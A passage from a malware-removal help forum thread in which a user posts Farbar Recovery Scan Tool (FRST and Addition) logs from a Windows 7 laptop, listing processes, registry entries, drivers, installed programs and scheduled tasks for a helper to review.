    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.

  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content in your next reply.
Link to post
Share on other sites

Thanks Radek...here are the log files.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-01-2015 01
Ran by User (administrator) on USER-PC on 26-01-2015 16:43:54
Running from C:\Users\User\Desktop\Malware stuff
Loaded Profiles: User (Available profiles: User)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgcsrvx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgwdsvc.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Creative Technology Ltd) C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgui.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgemcx.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [292208 2010-06-04] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Dell Webcam Central] => C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [409744 2009-06-24] (Creative Technology Ltd)
HKLM\...\Run: [sunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2015\avgui.exe [3667472 2014-12-18] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [sDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\Run: [DellSystemDetect] => C:\Users\User\AppData\Local\Apps\2.0\NLO15GEQ.9JN\QY5WA4B1.38M\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe [264488 2014-11-03] (Dell)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OemReset.lnk
ShortcutTarget: OemReset.lnk -> C:\Windows\options\OemReset.exe (SoftThinks SAS)
BootExecute: autocheck autochk * sdnclean.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [s-1-5-21-3179565126-1180787063-359821708-1000] => http=127.0.0.1:49329;https=127.0.0.1:49329
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.foxnews.com/
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3179565126-1180787063-359821708-1000: ubisoft.com/uplaypc -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CrazyTalk4Native.dll (C3D)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctdomemhelper.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctframeplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\imagickrt.dll (BEXTech)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npRLCT4Player.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\rlcontentclass.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLMusicPacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLMusicUnpacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLVoicePacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLVoiceUnpacker.dll ()

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2015\avgidsagent.exe [3432976 2014-12-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2015\avgwdsvc.exe [298080 2014-12-18] (AVG Technologies CZ, s.r.o.)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [1678040 2013-10-02] (Broadcom Corporation.)
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-26] (Microsoft Corporation)
S3 CaCCProvSP; "C:\Program Files\Total Defense\Internet Security Suite\ccprovsp.exe" [X]
S2 ccSchedulerSVC; C:\Program Files\Total Defense\Internet Security Suite\ccschedulersvc.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 Acceler; C:\Windows\System32\DRIVERS\accelern.sys [44144 2011-10-03] (ST Microelectronics)
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [208152 2014-12-08] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [154904 2014-11-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [192792 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [230680 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-10-05] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [200984 2014-10-10] (AVG Technologies CZ, s.r.o.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [174936 2013-10-02] (Broadcom Corporation.)
S3 btwampfl; C:\Windows\System32\DRIVERS\btwampfl.sys [144600 2013-10-02] (Broadcom Corporation.)
R3 cvusbdrv; C:\Windows\System32\Drivers\cvusbdrv.sys [32808 2008-07-23] (Broadcom Corporation)
R3 NETwNs32; C:\Windows\System32\DRIVERS\Netwsn00.sys [10364416 2012-06-03] (Intel Corporation)
S2 risdpcie; C:\Windows\System32\DRIVERS\RISDPE64.SYS [79360 2009-10-28] (REDC) [File not signed]
R0 stdcfltn; C:\Windows\System32\DRIVERS\stdcfltn.sys [17904 2011-07-15] (ST Microelectronics)
S3 USB28xxBGA; C:\Windows\System32\DRIVERS\emBDAA.sys [660120 2012-05-04] (eMPIA Technology, Inc.)
S3 USB28xxOEM; C:\Windows\System32\DRIVERS\emOEMA.sys [1085592 2012-05-04] (eMPIA Technology, Inc.)
S3 catchme; \??\C:\Users\User\AppData\Local\Temp\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-24 23:45 - 2015-01-24 23:45 - 00049646 _____ () C:\ComboFix.txt
2015-01-24 23:28 - 2015-01-24 23:28 - 00000000 ____D () C:\Users\User\Documents\ProcAlyzer Dumps
2015-01-24 13:30 - 2011-06-26 00:45 - 00256000 _____ () C:\Windows\PEV.exe
2015-01-24 13:30 - 2010-11-07 11:20 - 00208896 _____ () C:\Windows\MBR.exe
2015-01-24 13:30 - 2009-04-19 22:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00098816 _____ () C:\Windows\sed.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00080412 _____ () C:\Windows\grep.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00068096 _____ () C:\Windows\zip.exe
2015-01-24 13:28 - 2015-01-24 23:45 - 00000000 ____D () C:\Qoobox
2015-01-24 13:23 - 2015-01-24 16:08 - 00000000 ____D () C:\Windows\erdnt
2015-01-14 22:04 - 2015-01-26 16:43 - 00000000 ____D () C:\Users\User\Desktop\Malware stuff
2015-01-14 21:04 - 2015-01-26 16:43 - 00000000 ____D () C:\FRST
2015-01-14 19:59 - 2015-01-24 13:35 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2015-01-13 22:17 - 2014-12-11 23:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-01-13 22:17 - 2014-12-11 23:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-13 21:13 - 2014-12-18 19:34 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-13 21:07 - 2014-12-18 20:43 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-13 21:07 - 2014-12-11 11:47 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-13 21:07 - 2014-12-05 21:50 - 00242688 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-12 09:58 - 2015-01-12 09:58 - 00000000 ____D () C:\Users\Default\AppData\Roaming\TuneUp Software
2015-01-12 09:58 - 2015-01-12 09:58 - 00000000 ____D () C:\Users\Default User\AppData\Roaming\TuneUp Software
2015-01-05 17:30 - 2015-01-07 17:21 - 00000000 ____D () C:\Users\User\Downloads\avast free
2015-01-02 13:33 - 2015-01-21 15:41 - 00034171 _____ () C:\Users\Public\Documents\Master Volunteer List thru Dec 2014.xlsx
2015-01-02 12:42 - 2015-01-02 12:42 - 00000165 ____H () C:\Users\Public\Documents\~$Master Volunteer List thru Nov 2014.xlsx

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-26 16:44 - 2014-11-23 10:27 - 00000000 ____D () C:\ProgramData\MFAData
2015-01-26 16:43 - 2013-10-02 18:48 - 01983669 _____ () C:\Windows\WindowsUpdate.log
2015-01-26 16:41 - 2013-02-11 12:09 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-01-26 16:41 - 2013-02-11 12:09 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-01-26 16:41 - 2013-02-11 12:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-25 11:48 - 2009-07-13 22:34 - 00024832 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-25 11:48 - 2009-07-13 22:34 - 00024832 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-25 11:41 - 2013-02-09 05:35 - 01162034 _____ () C:\Windows\PFRO.log
2015-01-25 11:41 - 2009-07-13 22:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-25 11:41 - 2009-07-13 22:39 - 00049616 _____ () C:\Windows\setupact.log
2015-01-24 23:43 - 2009-07-13 20:04 - 00000215 _____ () C:\Windows\system.ini
2015-01-24 23:31 - 2014-11-23 21:08 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2015-01-24 23:18 - 2014-11-03 21:32 - 00000000 ____D () C:\Users\User\AppData\Local\Apps\2.0
2015-01-24 17:28 - 2014-06-15 13:21 - 00000000 ____D () C:\Users\User\AppData\Roaming\Battle.net
2015-01-24 17:28 - 2014-06-15 13:21 - 00000000 ____D () C:\Users\User\AppData\Local\Battle.net
2015-01-24 17:28 - 2014-06-15 13:19 - 00000000 ____D () C:\ProgramData\Battle.net
2015-01-24 17:20 - 2013-10-16 13:14 - 00000000 ___HD () C:\Program Files\InstallShield Installation Information
2015-01-24 17:19 - 2014-01-29 03:10 - 00000000 ____D () C:\Users\User\AppData\Local\Cyberlink
2015-01-24 17:19 - 2013-10-16 13:12 - 00000000 ____D () C:\Program Files\CyberLink
2015-01-24 16:26 - 2014-08-13 20:31 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-24 16:11 - 2009-07-13 20:37 - 00000000 ___RD () C:\Users\Public
2015-01-14 21:01 - 2013-02-08 18:15 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-14 20:00 - 2014-11-10 08:03 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2015-01-13 23:28 - 2013-10-16 12:33 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-13 23:24 - 2013-02-08 18:33 - 110348472 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-01-12 09:58 - 2014-11-23 11:33 - 00000935 _____ () C:\Users\Public\Desktop\AVG 2015.lnk
2015-01-12 09:58 - 2014-11-23 11:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2015-01-08 21:16 - 2014-05-14 17:47 - 00000000 ____D () C:\Users\Public\Documents\Kayla
2015-01-05 17:22 - 2014-08-13 20:31 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-01-05 17:22 - 2014-08-13 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-01-05 17:22 - 2014-08-13 20:31 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-01-02 13:30 - 2014-12-04 10:50 - 00032082 _____ () C:\Users\Public\Documents\Master Volunteer List thru Nov 2014.xlsx

==================== Files in the root of some directories =======

2014-11-04 21:33 - 2014-11-04 21:33 - 0000000 _____ () C:\Users\User\AppData\Roaming\qkmrs.dll
2013-12-25 09:47 - 2014-01-25 12:43 - 0005632 _____ () C:\Users\User\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-10-21 22:14 - 2013-10-21 22:14 - 0007602 _____ () C:\Users\User\AppData\Local\Resmon.ResmonCfg

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-01-14 17:23

==================== End Of Log ============================

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-01-2015 01
Ran by User at 2015-01-26 16:44:31
Running from C:\Users\User\Desktop\Malware stuff
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.296 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5645 - AVG Technologies)
AVG 2015 (Version: 15.0.4273 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5645 - AVG Technologies) Hidden
CorelVHS3X86 (HKLM\...\{CB91D8EE-AAC8-4921-AFCB-DB700EEF9D9B}) (Version: 1.05.0000 - Corel)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell System Detect (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\73f463568823ebbe) (Version: 5.12.0.3 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1007.101.210 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.8 - Intel)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Live! Cam Avatar Creator (HKLM\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.3009.1 - Creative Technology Ltd)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
OpenOffice 4.0.1 (HKLM\...\{47F460DA-D1BE-4D85-8DF2-AA1F31D3445F}) (Version: 4.01.9714 - Apache Software Foundation)
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\FileSyncApi.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-01-2015 13:30:52 ComboFix created restore point
24-01-2015 17:17:02 Configured PowerDVD
24-01-2015 17:21:57 Revo Uninstaller's restore point - Battle.net

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:04 - 2015-01-24 16:03 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {24101962-EFCD-48A3-9588-FE6571943DD3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {2E82AEF7-774A-4868-BDA0-4176292D000C} - System32\Tasks\{EBC0B43D-34B9-407B-966A-63943AD95EE7} => C:\Program Files\Freemake\Freemake Video Converter\FreemakeVideoConverter.exe
Task: {4480FA26-0DE2-4425-8D00-BFBA97D00B67} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
